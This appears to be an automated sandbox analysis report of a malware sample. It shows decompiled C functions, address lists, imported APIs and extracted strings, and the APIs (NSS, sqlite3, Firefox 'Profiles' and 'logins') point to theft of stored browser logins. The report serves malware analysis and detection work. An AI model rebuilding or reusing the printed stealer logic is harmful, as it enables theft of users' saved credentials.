					_t752 = E001C9597(_t1032);
				}
				_t1033 =  *(_t1369 - 0xec);
				__eflags =  *(_t1369 - 0xec);
				if( *(_t1369 - 0xec) != 0) {
					_t752 = E001C9597(_t1033);
				}
				_t1034 =  *(_t1369 - 0xf8);
				__eflags =  *(_t1369 - 0xf8);
				if( *(_t1369 - 0xf8) != 0) {
					_t752 = E001C9597(_t1034);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t1369 - 0xc));
				return _t752;
			}

0x001e10b1
0x001e10b6
0x001e10bb
0x001e10c4
0x001e10cf
0x001e10dc
0x001e10e3
0x001e10e5
0x001e10e8
0x001e10eb
0x001e111d
0x001e1122
0x001e112b
0x001e1134
0x001e1139
0x001e1142
0x001e1145
0x001e114c
0x001e1157
0x001e1169
0x001e1174
0x001e1180
0x001e1186
0x001e118c
0x001e119f
0x001e11a4
0x001e11a6
0x001e11a9
0x001e11b1
0x001e11b7
0x001e11c3
0x001e11cb
0x001e11d0
0x001e11d0
0x001e11d6
0x001e11da
0x001e11e4
0x001e11eb
0x001e11eb
0x001e11f7
0x00000000
0x00000000
0x001e11fd
0x001e1200
0x001e1204
0x001e120d
0x001e1223
0x001e122b
0x001e122e
0x001e1231
0x001e1234
0x001e1245
0x001e124d
0x001e1256
0x001e125a
0x001e125c
0x001e1263
0x001e1269
0x001e1270
0x001e1272
0x001e1279
0x001e127f
0x001e128c
0x001e1293
0x001e1294
0x001e1299
0x001e12a0
0x001e12a9
0x001e12b7
0x001e12c1
0x001e12d1
0x001e12d4
0x001e12db
0x001e12e0
0x001e12e9
0x001e12f5
0x001e12f8
0x001e12fe
0x001e130b
0x001e130e
0x001e1311
0x001e131b
0x001e13e0
0x001e13e0
0x001e1321
0x001e1321
0x001e1323
0x001e132d
0x001e1337
0x001e1339
0x001e1340
0x001e1346
0x001e1346
0x001e134d
0x001e1351
0x00000000
0x00000000
0x001e1353
0x001e1353
0x001e135b
0x001e1362
0x001e1368
0x001e1373
0x001e1380
0x001e1389
0x001e1390
0x001e1393
0x001e139a
0x001e139f
0x001e13a8
0x001e13b4
0x001e13b7
0x001e13bd
0x001e13ca
0x001e13cd
0x001e13d0
0x001e13d3
0x001e13d8
0x001e13dc
0x001e13de
0x00000000
0x00000000
0x001e13de
0x001e13e3
0x001e13e6
0x001e13e8
0x001e13ea
0x001e13ea
0x001e13f3
0x001e13f6
0x001e13f9
0x001e13fe
0x001e13fe
0x001e1401
0x001e1403
0x001e1405
0x001e1405
0x001e140e
0x001e1411
0x001e1414
0x001e1419
0x001e1419
0x001e141c
0x001e141e
0x001e1420
0x001e1420
0x001e1429
0x001e142c
0x001e142f
0x001e1434
0x001e1434
0x001e1437
0x001e143e
0x001e1440
0x001e1442
0x001e1442
0x001e144b
0x001e144e
0x001e1451
0x001e1451
0x001e1456
0x001e145a
0x001e18e4
0x001e18e6
0x001e18ed
0x001e18f4
0x001e18f6
0x001e18fd
0x001e1903
0x001e1903
0x001e1907
0x001e1908
0x001e190b
0x00000000
0x00000000
0x001e190d
0x001e190d
0x001e1912
0x001e1919
0x001e191f
0x001e1927
0x001e192d
0x001e1930
0x001e1933
0x001e193d
0x001e1947
0x001e194e
0x001e1953
0x001e195c
0x001e1968
0x001e196b
0x001e1977
0x001e1986
0x001e1989
0x001e1994
0x001e1998
0x001e199d
0x001e19a1
0x001e19a7
0x001e19a9
0x001e19b0
0x001e19b7
0x001e19b9
0x001e19c0
0x001e19c6
0x001e19c6
0x001e19ca
0x001e19cb
0x001e19ce
0x00000000
0x00000000
0x001e19d0
0x001e19d0
0x001e19d5
0x001e19dc
0x001e19e2
0x001e19e7
0x001e19ed
0x001e19f0
0x001e19f3
0x001e19fa
0x001e1a07
0x001e1a08
0x001e1a11
0x001e1a16
0x001e1a19
0x001e1a1d
0x001e1a25
0x001e1a2b
0x001e1a3b
0x001e1a3d
0x001e1a45
0x001e1a47
0x001e1a51
0x001e1a5f
0x001e1a61
0x001e1a69
0x001e1a6f
0x001e1a72
0x001e1a7e
0x001e1a88
0x001e1a90
0x001e1a95
0x001e1a9f
0x001e1aa7
0x001e1ab2
0x001e1ac6
0x001e1acd
0x001e1ad4
0x001e1ad6
0x001e1ae3
0x001e1aea
0x001e1aeb
0x001e1af2
0x001e1af7
0x001e1af9
0x001e1afc
0x001e1b02
0x001e1b0e
0x001e1b11
0x001e1b16
0x001e1b19
0x001e1b1d
0x001e1b23
0x001e1b25
0x001e1b27
0x001e1b27
0x001e1b2c
0x001e1b3c
0x001e1b3f
0x001e1b45
0x001e1b50
0x001e1b5b
0x001e1b5e
0x001e1b63
0x001e1b63
0x001e1b63
0x001e1b6a
0x001e1b6e
0x001e1b70
0x001e1b73
0x001e1b79
0x001e1b84
0x001e1b86
0x00000000
0x00000000
0x001e1b8e
0x001e1b91
0x001e1b9b
0x001e1b9e
0x001e2072
0x001e2074
0x001e207e
0x001e2088
0x001e208a
0x001e2094
0x001e209d
0x001e20a3
0x001e20a3
0x001e20aa
0x001e20ab
0x001e20ae
0x00000000
0x00000000
0x001e20b0
0x001e20b0
0x001e20be
0x001e20c4
0x001e20c7
0x001e20cc
0x001e20cf
0x001e20db
0x001e20dd
0x001e20e4
0x001e20eb
0x001e20f4
0x001e20f7
0x001e20fd
0x001e20fd
0x001e2103
0x001e210a
0x001e210b
0x001e210b
0x001e2116
0x001e211c
0x001e211d
0x001e2122
0x001e2125
0x001e2131
0x001e2133
0x001e213a
0x001e2141
0x001e214a
0x001e214d
0x001e2153
0x001e2160
0x001e2167
0x001e2168
0x001e2168
0x001e2173
0x001e2179
0x001e217a
0x001e217f
0x001e2182
0x001e218a
0x001e218b
0x001e2191
0x001e2197
0x001e219d
0x001e21a3
0x001e21a9
0x001e21af
0x001e21b5
0x001e21bb
0x001e21c1
0x001e21c7
0x001e21cd
0x001e21d3
0x001e21d7
0x001e21df
0x001e21e6
0x001e21ed
0x001e21f6
0x001e21f9
0x001e21ff
0x001e220c
0x001e2213
0x001e2214
0x001e2214
0x001e221f
0x001e2225
0x001e2226
0x001e2231
0x001e2239
0x001e223b
0x001e2241
0x001e2243
0x001e2247
0x001e2253
0x001e2253
0x001e225e
0x001e2269
0x001e226b
0x001e2272
0x001e2279
0x001e2282
0x001e2285
0x001e228b
0x001e2298
0x001e229f
0x001e22a0
0x001e22a0
0x001e22ab
0x001e22b1
0x001e22b2
0x001e22bd
0x001e22c5
0x001e22c7
0x001e22cd
0x001e22cf
0x001e22d3
0x001e22df
0x001e22df
0x001e22ea
0x001e22f5
0x001e22f7
0x001e22f7
0x001e22f9
0x001e2303
0x001e230d
0x001e230f
0x001e2319
0x001e2322
0x001e2328
0x001e2328
0x001e232f
0x001e2330
0x001e2333
0x00000000
0x00000000
0x001e2335
0x001e2335
0x001e2343
0x001e2349
0x001e234c
0x001e2357
0x001e235f
0x001e2361
0x001e2367
0x001e2369
0x001e236d
0x001e2379
0x001e2379
0x001e2384
0x001e2389
0x001e2391
0x001e2397
0x001e239b
0x001e239c
0x001e239f
0x001e23a2
0x001e23a4
0x001e23aa
0x001e23b0
0x001e23b2
0x001e23b5
0x001e23b8
0x001e23b8
0x001e23bb
0x001e23be
0x001e23c4
0x001e23c7
0x001e23cb
0x001e23ce
0x001e23d0
0x001e23d2
0x001e23d5
0x001e23d7
0x001e23e4
0x001e23e9
0x001e23ec
0x001e23f4
0x001e23fb
0x001e2400
0x001e2406
0x001e2406
0x001e2409
0x001e240c
0x001e240f
0x001e2416
0x001e2419
0x001e241d
0x001e241d
0x001e2422
0x001e2428
0x001e2428
0x001e242b
0x001e242b
0x001e242f
0x001e2432
0x001e2437
0x001e2439
0x001e243c
0x001e2443
0x001e2446
0x001e2446
0x001e23b8
0x001e244f
0x001e2462
0x001e246e
0x001e2470
0x001e2474
0x001e2478
0x001e247a
0x001e247a
0x001e247c
0x001e248f
0x001e2496
0x001e249b
0x001e249f
0x001e24a3
0x001e24a5
0x001e24a5
0x001e24a7
0x001e24b4
0x001e24b5
0x001e24b5
0x001e24ca
0x001e24cc
0x001e24d7
0x001e24db
0x001e24e0
0x001e24e2
0x001e24e9
0x001e24f0
0x001e24f2
0x001e24f2
0x001e24f6
0x001e24f7
0x001e24fa
0x00000000
0x00000000
0x001e24fc
0x001e24fc
0x001e2504
0x001e2511
0x001e2514
0x001e251a
0x001e2524
0x001e252a
0x001e2534
0x001e254d
0x001e2559
0x001e2564
0x001e2568
0x001e2571
0x001e2576
0x001e2576
0x001e2582
0x001e258d
0x001e2592
0x00000000
0x001e2592
0x001e2182
0x001e2125
0x001e1ba4
0x001e1ba4
0x001e1ba6
0x001e1bad
0x001e1bb4
0x001e1bb6
0x001e1bbc
0x001e1bbc
0x001e1bc0
0x001e1bc1
0x001e1bc4
0x00000000
0x00000000
0x001e1bc6
0x001e1bc6
0x001e1bce
0x001e1bd1
0x001e1bd4
0x001e1bd9
0x001e1bdc
0x001e1be8
0x001e1bea
0x001e1bf1
0x001e1bf8
0x001e1c01
0x001e1c04
0x001e1c0a
0x001e1c17
0x001e1c1e
0x001e1c1f
0x001e1c1f
0x001e1c2a
0x001e1c30
0x001e1c31
0x001e1c36
0x001e1c39
0x001e1c45
0x001e1c47
0x001e1c4e
0x001e1c55
0x001e1c5e
0x001e1c61
0x001e1c67
0x001e1c67
0x001e1c6d
0x001e1c74
0x001e1c75
0x001e1c75
0x001e1c80
0x001e1c86
0x001e1c87
0x001e1c8c
0x001e1c8f
0x001e1c97
0x001e1c98
0x001e1c9e
0x001e1ca4
0x001e1caa
0x001e1cb0
0x001e1cb6
0x001e1cbc
0x001e1cc2
0x001e1cc8
0x001e1cce
0x001e1cd4
0x001e1cda
0x001e1ce0
0x001e1ce4
0x001e1cec
0x001e1cf3
0x001e1cfa
0x001e1d03
0x001e1d06
0x001e1d0c
0x001e1d19
0x001e1d20
0x001e1d21
0x001e1d21
0x001e1d2c
0x001e1d32
0x001e1d33
0x001e1d3e
0x001e1d46
0x001e1d48
0x001e1d4e
0x001e1d50
0x001e1d54
0x001e1d60
0x001e1d60
0x001e1d6b
0x001e1d76
0x001e1d78
0x001e1d7f
0x001e1d86
0x001e1d8f
0x001e1d92
0x001e1d98
0x001e1da5
0x001e1dac
0x001e1dad
0x001e1dad
0x001e1db8
0x001e1dbe
0x001e1dbf
0x001e1dca
0x001e1dd2
0x001e1dd4
0x001e1dda
0x001e1ddc
0x001e1de0
0x001e1dec
0x001e1dec
0x001e1df7
0x001e1e02
0x001e1e04
0x001e1e04
0x001e1e06
0x001e1e0d
0x001e1e14
0x001e1e16
0x001e1e1c
0x001e1e1c
0x001e1e20
0x001e1e21
0x001e1e24
0x00000000
0x00000000
0x001e1e26
0x001e1e26
0x001e1e26
0x001e1e2e
0x001e1e31
0x001e1e34
0x001e1e3f
0x001e1e47
0x001e1e49
0x001e1e4f
0x001e1e51
0x001e1e55
0x001e1e61
0x001e1e61
0x001e1e6c
0x001e1e71
0x001e1e79
0x001e1e7f
0x001e1e83
0x001e1e84
0x001e1e87
0x001e1e8a
0x001e1e8c
0x001e1e92
0x001e1e98
0x001e1e9a
0x001e1e9d
0x001e1ea0
0x001e1ea0
0x001e1ea3
0x001e1ea6
0x001e1eac
0x001e1eaf
0x001e1eb3
0x001e1eb6
0x001e1eb8
0x001e1eba
0x001e1ebd
0x001e1ebf
0x001e1ecc
0x001e1ed1
0x001e1ed4
0x001e1edc
0x001e1ee3
0x001e1ee8
0x001e1eee
0x001e1eee
0x001e1ef1
0x001e1ef4
0x001e1ef7
0x001e1efe
0x001e1f01
0x001e1f05
0x001e1f05
0x001e1f0a
0x001e1f10
0x001e1f10
0x001e1f13
0x001e1f13
0x001e1f17
0x001e1f1a
0x001e1f1f
0x001e1f21
0x001e1f24
0x001e1f2b
0x001e1f2e
0x001e1f2e
0x001e1ea0
0x001e1f37
0x001e1f4a
0x001e1f56
0x001e1f58
0x001e1f5c
0x001e1f60
0x001e1f62
0x001e1f62
0x001e1f64
0x001e1f77
0x001e1f7e
0x001e1f83
0x001e1f87
0x001e1f8b
0x001e1f8d
0x001e1f8d
0x001e1f8f
0x001e1f9c
0x001e1f9d
0x001e1fb2
0x001e1fb4
0x001e1fb9
0x001e1fbf
0x001e1fc3
0x001e1fc8
0x001e1fcf
0x001e1fd4
0x001e1fd8
0x001e1fda
0x001e1fe1
0x001e1fe8
0x001e1fee
0x001e1ffb
0x001e2002
0x001e2003
0x001e2003
0x001e2008
0x001e2019
0x001e201b
0x001e2020
0x001e2021
0x001e2029
0x001e2036
0x001e2041
0x001e204c
0x001e2057
0x001e2062
0x001e2067
0x001e2598
0x001e2598
0x001e259c
0x001e259c
0x001e1c8f
0x001e1c39
0x001e1bdc
0x001e25a4
0x001e25a5
0x001e25a5
0x001e25b3
0x001e25b8
0x001e25b8
0x001e25c4
0x001e25c9
0x001e25ca
0x001e25d7
0x001e25dc
0x00000000
0x001e25dc
0x001e1a47
0x001e1460
0x001e1460
0x001e1467
0x001e146b
0x001e1472
0x001e1478
0x001e1479
0x001e147f
0x001e1486
0x001e148d
0x001e148e
0x001e148e
0x001e1499
0x001e14a2
0x001e14aa
0x001e14af
0x001e14b2
0x001e14b5
0x001e14bf
0x001e14cc
0x001e14d3
0x001e14d8
0x001e14e5
0x001e14eb
0x001e14f1
0x001e14f7
0x001e1502
0x001e1506
0x001e150d
0x001e1514
0x001e1519
0x001e1523
0x001e152a
0x001e1531
0x001e1536
0x001e153a
0x001e153f
0x001e154c
0x001e1552
0x001e155c
0x001e1562
0x001e1567
0x001e157f
0x001e1583
0x001e1589
0x001e15a1
0x001e15a5
0x001e15b1
0x001e15bb
0x001e15c6
0x001e15d1
0x001e15d5
0x001e15da
0x001e15f3
0x001e15fc
0x001e1600
0x001e1602
0x001e1608
0x001e160f
0x001e1611
0x001e1618
0x001e1622
0x001e1629
0x001e1630
0x001e163a
0x001e1641
0x001e1648
0x001e1652
0x001e1659
0x001e1660
0x001e1666
0x001e166d
0x001e166e
0x001e166e
0x001e1685
0x001e1692
0x001e1694
0x001e1697
0x001e1699
0x001e169f
0x001e16a7
0x001e16aa
0x001e16ad
0x00000000
0x00000000
0x001e16bc
0x001e16c5
0x001e16cd
0x001e16d6
0x001e16de
0x001e16e2
0x001e16e8
0x001e16ec
0x001e16ef
0x001e16f0
0x001e16f0
0x001e16f7
0x001e16fa
0x001e16fc
0x00000000
0x00000000
0x001e1702
0x001e1707
0x001e170a
0x001e1710
0x001e1712
0x001e1715
0x001e1715
0x001e1718
0x001e171f
0x001e1722
0x001e1726
0x001e1728
0x00000000
0x00000000
0x001e1733
0x001e1739
0x001e173f
0x001e1749
0x001e174e
0x001e1764
0x001e1771
0x001e1776
0x001e1779
0x001e177b
0x001e1780
0x001e1780
0x001e178a
0x001e1790
0x001e1791
0x001e1791
0x001e179b
0x001e179b
0x001e179c
0x001e179c
0x001e17b0
0x001e17b2
0x001e17b6
0x001e17ba
0x001e17bc
0x001e17bc
0x001e17c7
0x001e17cc
0x001e17d0
0x001e17d4
0x001e17d6
0x001e17d6
0x001e17dd
0x001e17ea
0x001e17ec
0x001e17f7
0x001e17fb
0x001e1800
0x001e1802
0x001e1809
0x001e1810
0x001e1812
0x001e1812
0x001e1816
0x001e1817
0x001e181a
0x00000000
0x00000000
0x001e181c
0x001e181c
0x001e1824
0x001e1831
0x001e1834
0x001e183a
0x001e1844
0x001e184a
0x001e1854
0x001e186d
0x001e1879
0x001e1884
0x001e1888
0x001e1891
0x001e1896
0x001e1896
0x001e169f
0x001e18a1
0x001e18a4
0x001e18b1
0x001e18be
0x001e18be
0x001e18c9
0x001e18d4
0x001e18d9
0x001e25e2
0x001e25e2
0x001e25e6
0x001e25e6
0x001e25eb
0x001e25eb
0x001e1263
0x001e25f1
0x001e263d
0x001e2642
0x001e2642
0x001e264d
0x001e264f
0x001e2651
0x001e2651
0x001e2656
0x001e265c
0x001e265e
0x001e2660
0x001e2660
0x001e2665
0x001e266b
0x001e266d
0x001e266f
0x001e266f
0x001e2679
0x001e2682

APIs

__EH_prolog.LIBCMT ref: 001E10B6
SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,?,00000001,00000000), ref: 001E10EB

Part of subcall function 001F57CC: __EH_prolog.LIBCMT ref: 001F57D1

Part of subcall function 001CAC66: __EH_prolog.LIBCMT ref: 001CAC6B

Part of subcall function 001D2D4F: _Deallocate.LIBCONCRT ref: 001D2D64

NSS_Init.NSS3(?), ref: 001E124D
NSS_Shutdown.NSS3(?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 001E25EB

Part of subcall function 001D2F2D: _Deallocate.LIBCONCRT ref: 001D2F3C

sqlite3_finalize.NSS3(?,?,?,?,?), ref: 001E18A4
sqlite3_close.NSS3(?,?,?), ref: 001E18B1
__fread_nolock.LIBCMT ref: 001E1AB2

Part of subcall function 001E7160: __EH_prolog.LIBCMT ref: 001E7165

Strings

Gy_H, xrefs: 001E207E
&NIURHGKC, xrefs: 001E1E26
:,, xrefs: 001E2141
2:, xrefs: 001E20EB
RD, xrefs: 001E1D86
v, xrefs: 001E18FD
c.,9, xrefs: 001E1618
>6, xrefs: 001E21ED
<4, xrefs: 001E1BF8
logins, xrefs: 001E1B2C, 001E1B45
xf, xrefs: 001E2094
1', xrefs: 001E2279
6rkw, xrefs: 001E18F6
W9#, xrefs: 001E1809
nt{w, xrefs: 001E1BAD
F )4, xrefs: 001E22F9
Profiles, xrefs: 001E10FD
*LEX, xrefs: 001E2074
%, xrefs: 001E2564

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: H_prolog$Deallocate$FolderInitPathShutdown__fread_nolocksqlite3_closesqlite3_finalize
String ID: %$&NIURHGKC$*LEX$1'$2:$6rkw$:,$<4$>6$F )4$Gy_H$Profiles$RD$W9#$c.,9$logins$nt{w$v$xf
API String ID: 2110271156-579959898
Opcode ID: 78a0c8c2e95fc71f8e18cf27a57a8d1fd842a799ce156d35cea5b954b1dd0f75
Instruction ID: 4cd2bf8c699a09f5087e07f28d8cb1a801921666458b5f902b71dbf27739f8a3
Opcode Fuzzy Hash: 78a0c8c2e95fc71f8e18cf27a57a8d1fd842a799ce156d35cea5b954b1dd0f75
Instruction Fuzzy Hash: 0ED29770D056A98BCB25DF68D8A4BEDBBB5BF29300F5441EAE409A7242DB705F84CF50

Uniqueness

Uniqueness Score: -1.00%

Function 001E06DD, Relevance: 40.9, APIs: 15, Strings: 8, Instructions: 607
libraryloaderCOMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E001E06DD(struct HINSTANCE__* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char _t238;
				char _t240;
				struct HINSTANCE__* _t241;
				void* _t242;
				struct HINSTANCE__ _t244;
				struct HINSTANCE__* _t246;
				void* _t248;
				struct HINSTANCE__ _t250;
				struct HINSTANCE__* _t252;
				void* _t254;
				struct HINSTANCE__ _t256;
				void* _t258;
				struct HINSTANCE__* _t260;
				struct HINSTANCE__* _t262;
				void* _t263;
				struct HINSTANCE__* _t266;
				_Unknown_base(*)()* _t268;
				struct HINSTANCE__* _t269;
				_Unknown_base(*)()* _t271;
				_Unknown_base(*)()* _t274;
				struct HINSTANCE__* _t275;
				_Unknown_base(*)()* _t277;
				_Unknown_base(*)()* _t280;
				_Unknown_base(*)()* _t283;
				char _t284;
				_Unknown_base(*)()* _t286;
				_Unknown_base(*)()* _t289;
				char _t290;
				_Unknown_base(*)()* _t292;
				_Unknown_base(*)()* _t295;
				struct HINSTANCE__* _t299;
				void* _t302;
				void* _t304;
				void* _t310;
				void* _t311;
				void* _t315;
				void* _t317;
				struct HINSTANCE__* _t319;
				void* _t324;
				signed int _t327;
				void* _t328;
				void* _t329;
				struct HINSTANCE__* _t330;
				struct HINSTANCE__* _t333;
				void* _t335;
				void* _t337;
				signed char _t349;
				signed char _t355;
				void* _t358;
				signed int _t359;
				signed char _t363;
				signed char _t386;
				signed char _t390;
				signed char _t391;
				struct HINSTANCE__* _t392;
				signed char _t393;
				struct HINSTANCE__* _t394;
				struct HINSTANCE__* _t395;
				signed char _t396;
				char _t397;
				signed char _t398;
				struct HINSTANCE__* _t399;
				struct HINSTANCE__* _t400;
				char _t402;
				void* _t419;
				struct HINSTANCE__* _t430;
				void* _t432;
				struct HINSTANCE__* _t445;
				signed char _t450;
				signed int _t459;
				void* _t465;
				void* _t467;
				struct HINSTANCE__* _t470;
				struct HINSTANCE__* _t472;
				signed int _t477;
				struct HINSTANCE__* _t479;
				void* _t482;
				intOrPtr _t486;
				struct HINSTANCE__* _t490;
				void* _t492;
				void* _t494;
				void* _t495;

				L00227790(0x2293b8, _t492);
				_t495 = _t494 - 0x194;
				_t472 = __ecx;
				_push(_t465);
				 *(_t492 - 0x14) = __ecx;
				if( *0x24c1d4 != 0) {
					__eflags =  *0x24c1d8;
					if( *0x24c1d8 == 0) {
						L79:
						_t238 = 0;
						__eflags = 0;
					} else {
						__eflags =  *0x24c1f4;
						if( *0x24c1f4 == 0) {
							goto L79;
						} else {
							__eflags =  *0x24c1f8;
							if( *0x24c1f8 == 0) {
								goto L79;
							} else {
								__eflags =  *0x24c1e4;
								if( *0x24c1e4 == 0) {
									goto L79;
								} else {
									__eflags =  *0x24c1e0;
									if( *0x24c1e0 == 0) {
										goto L79;
									} else {
										__eflags =  *0x24c1e8;
										if( *0x24c1e8 == 0) {
											goto L79;
										} else {
											_t238 = 1;
										}
									}
								}
							}
						}
					}
				} else {
					_t240 = 0x21;
					_t363 = 0x4d;
					 *(_t492 - 0x24) = 0x234d;
					 *((char*)(_t492 - 0x22)) = 0x38;
					_t432 = 0;
					 *((char*)(_t492 - 0x21)) = _t240;
					 *((char*)(_t492 - 0x20)) = _t240;
					 *((char*)(_t492 - 0x1f)) = 0;
					while(1) {
						 *(_t492 + _t432 - 0x23) =  *(_t492 + _t432 - 0x23) ^ _t363;
						_t432 = _t432 + 1;
						if(_t432 >= 4) {
							break;
						}
						_t363 =  *(_t492 - 0x24);
					}
					 *((char*)(_t492 - 0x1f)) = 0;
					_t241 = E001D3D6E(_t472, _t492 - 0x23, _t465, _t472);
					_t349 = 1;
					__eflags = _t241;
					if(_t241 != 0) {
						L64:
						__eflags =  *0x24c1d8;
						if( *0x24c1d8 == 0) {
							L70:
							_t349 = 0;
							__eflags = 0;
						} else {
							__eflags =  *0x24c1f4;
							if( *0x24c1f4 == 0) {
								goto L70;
							} else {
								__eflags =  *0x24c1f8;
								if( *0x24c1f8 == 0) {
									goto L70;
								} else {
									__eflags =  *0x24c1e4;
									if( *0x24c1e4 == 0) {
										goto L70;
									} else {
										__eflags =  *0x24c1e0;
										if( *0x24c1e0 == 0) {
											goto L70;
										} else {
											__eflags =  *0x24c1e8;
											if( *0x24c1e8 == 0) {
												goto L70;
											}
										}
									}
								}
							}
						}
						_t238 = _t349;
					} else {
						__eflags =  *0x248884 - 0x10;
						_t467 = 0x248780;
						_t435 =  >=  ?  *0x248870 : 0x248870;
						__eflags =  *0x248794 - 0x10;
						_t366 =  >=  ?  *0x248780 : 0x248780;
						_t242 = L001F57CC( >=  ?  *0x248780 : 0x248780,  >=  ?  *0x248870 : 0x248870);
						_t244 = L001F57CC(E001F5C6D(), _t242);
						 *((char*)(_t492 - 0x5c)) = 0;
						_push( *((intOrPtr*)(_t492 - 0x5c)));
						 *(_t492 - 0x24) = _t244;
						E001D4BA2(_t492 - 0x24);
						 *(_t492 - 4) =  *(_t492 - 4) & 0x00000000;
						_t246 = E001D54E9(_t492 - 0x58);
						 *(_t492 - 4) =  *(_t492 - 4) | 0xffffffff;
						E001D2D4F(_t492 - 0x58);
						__eflags = _t246;
						if(_t246 == 0) {
							__eflags =  *0x248794 - 0x10;
							_t484 =  >=  ?  *0x248780 : 0x248780;
							_t310 = E001F5C6D();
							_t451 =  >=  ?  *0x248780 : 0x248780;
							_t311 = L001F57CC(_t310,  >=  ?  *0x248780 : 0x248780);
							 *((intOrPtr*)(_t492 - 0x44)) = 0xf;
							 *(_t492 - 0x58) = 0;
							 *(_t492 - 0x48) = 0;
							L001D2F8E(_t311);
							E001CB7F6(_t492 - 0x58); // executed
							E001D2F2D(_t492 - 0x58);
							__eflags =  *0x2485e4 - 0x10;
							_t453 =  >=  ?  *0x2485d0 : 0x2485d0;
							__eflags =  *0x248794 - 0x10;
							_t408 =  >=  ?  *0x248780 : 0x248780;
							_t315 = L001F57CC( >=  ?  *0x248780 : 0x248780,  >=  ?  *0x2485d0 : 0x2485d0);
							_t317 = L001F57CC(E001F5C6D(), _t315);
							_t486 = 0xf;
							 *(_t492 - 0x58) = 0;
							 *(_t492 - 0x48) = 0;
							 *((intOrPtr*)(_t492 - 0x44)) = _t486;
							 *(_t492 - 0x58) = 0;
							L001D2F8E(_t317);
							_t358 = 1;
							 *(_t492 - 4) = 1;
							_t319 =  *(_t492 - 0x14);
							__eflags =  *((intOrPtr*)(_t319 + 0x14)) - 0x10;
							if( *((intOrPtr*)(_t319 + 0x14)) >= 0x10) {
								_t319 = _t319->i;
							}
							 *((intOrPtr*)(_t492 - 0x60)) = _t486;
							 *((intOrPtr*)(_t492 - 0x74)) = 0;
							 *((intOrPtr*)(_t492 - 0x64)) = 0;
							 *((char*)(_t492 - 0x74)) = 0;
							L001D2F8E(_t319);
							 *(_t492 - 4) = 2;
							E001F44AA(_t492 - 0x74, _t492 - 0x58); // executed
							E001D2F2D(_t492 - 0x74);
							 *(_t492 - 4) =  *(_t492 - 4) | 0xffffffff;
							E001D2F2D(_t492 - 0x58);
							__eflags =  *0x248794 - 0x10;
							_t488 =  >=  ?  *0x248780 : _t467;
							_t324 = E001F5C6D();
							_t456 =  >=  ?  *0x248780 : _t467;
							SetCurrentDirectoryA(L001F57CC(_t324,  >=  ?  *0x248780 : _t467)); // executed
							__eflags =  *0x2485e4 - 0x10;
							_t458 =  >=  ?  *0x2485d0 : 0x2485d0;
							__eflags =  *0x248794 - 0x10;
							_t418 =  >=  ?  *0x248780 : _t467;
							_t327 = L001F57CC( >=  ?  *0x248780 : _t467,  >=  ?  *0x2485d0 : 0x2485d0);
							_t328 = E001F5C6D();
							_t459 = _t327;
							_t419 = _t328;
							_t329 = L001F57CC(_t419, _t459);
							_push(_t419);
							_push(_t419);
							_t330 = E001E0568(_t329, __eflags); // executed
							_t490 = _t330;
							_t460 = _t459 | 0xffffffff;
							E001E05EC(_t490, _t459 | 0xffffffff, _t492 - 0x1a0);
							_t333 =  *(_t492 - 0x1a0);
							_t495 = _t495 + 0xc;
							 *(_t492 - 0x14) =  *(_t492 - 0x14) & 0x00000000;
							__eflags = _t333;
							if(_t333 > 0) {
								_t359 =  *(_t492 - 0x14);
								_t470 = _t333;
								do {
									_t430 = _t490; // executed
									E001E05EC(_t430, _t359, _t492 - 0x1a0); // executed
									_push(_t430);
									_t460 = _t359;
									E001E0628(_t490, _t359, _t492 - 0x19c); // executed
									_t495 = _t495 + 0xc;
									_t359 = _t359 + 1;
									__eflags = _t359 - _t470;
								} while (_t359 < _t470);
								_t467 = 0x248780;
								_t358 = 1;
								__eflags = 1;
							}
							__eflags = _t490;
							if(_t490 == 0) {
								L15:
								E001FEAC9(_t490);
							} else {
								__eflags = _t490->i - _t358;
								if(_t490->i != _t358) {
									goto L15;
								} else {
									E001E0657(_t490, _t460);
								}
							}
							__eflags =  *0x2485e4 - 0x10;
							_t462 =  >=  ?  *0x2485d0 : 0x2485d0;
							__eflags =  *0x248794 - 0x10;
							_t424 =  >=  ?  *0x248780 : _t467;
							_t335 = L001F57CC( >=  ?  *0x248780 : _t467,  >=  ?  *0x2485d0 : 0x2485d0);
							_t337 = L001F57CC(E001F5C6D(), _t335);
							 *(_t492 - 0x58) =  *(_t492 - 0x58) & 0x00000000;
							_t61 = _t492 - 0x48;
							 *_t61 =  *(_t492 - 0x48) & 0x00000000;
							__eflags =  *_t61;
							 *((intOrPtr*)(_t492 - 0x44)) = 0xf;
							L001D2F8E(_t337);
							E001CB7A7(_t492 - 0x58); // executed
							E001D2F2D(_t492 - 0x58);
						}
						__eflags =  *0x248884 - 0x10;
						_t439 =  >=  ?  *0x248870 : 0x248870;
						__eflags =  *0x248794 - 0x10;
						_t373 =  >=  ?  *0x248780 : _t467;
						_t248 = L001F57CC( >=  ?  *0x248780 : _t467,  >=  ?  *0x248870 : 0x248870);
						_t250 = L001F57CC(E001F5C6D(), _t248);
						 *((char*)(_t492 - 0x11)) = 0;
						_push( *((intOrPtr*)(_t492 - 0x11)));
						 *(_t492 - 0x24) = _t250;
						E001D4BA2(_t492 - 0x24);
						 *(_t492 - 4) = 3;
						_t252 = E001D54E9(_t492 - 0x58);
						 *(_t492 - 4) =  *(_t492 - 4) | 0xffffffff;
						_t351 = _t252;
						E001D2D4F(_t492 - 0x58);
						__eflags = _t252;
						if(_t252 == 0) {
							L63:
							_t349 = 1;
							__eflags = 1;
							goto L64;
						} else {
							__eflags =  *0x248884 - 0x10;
							_t443 =  >=  ?  *0x248870 : 0x248870;
							__eflags =  *0x248794 - 0x10;
							_t380 =  >=  ?  *0x248780 : _t467;
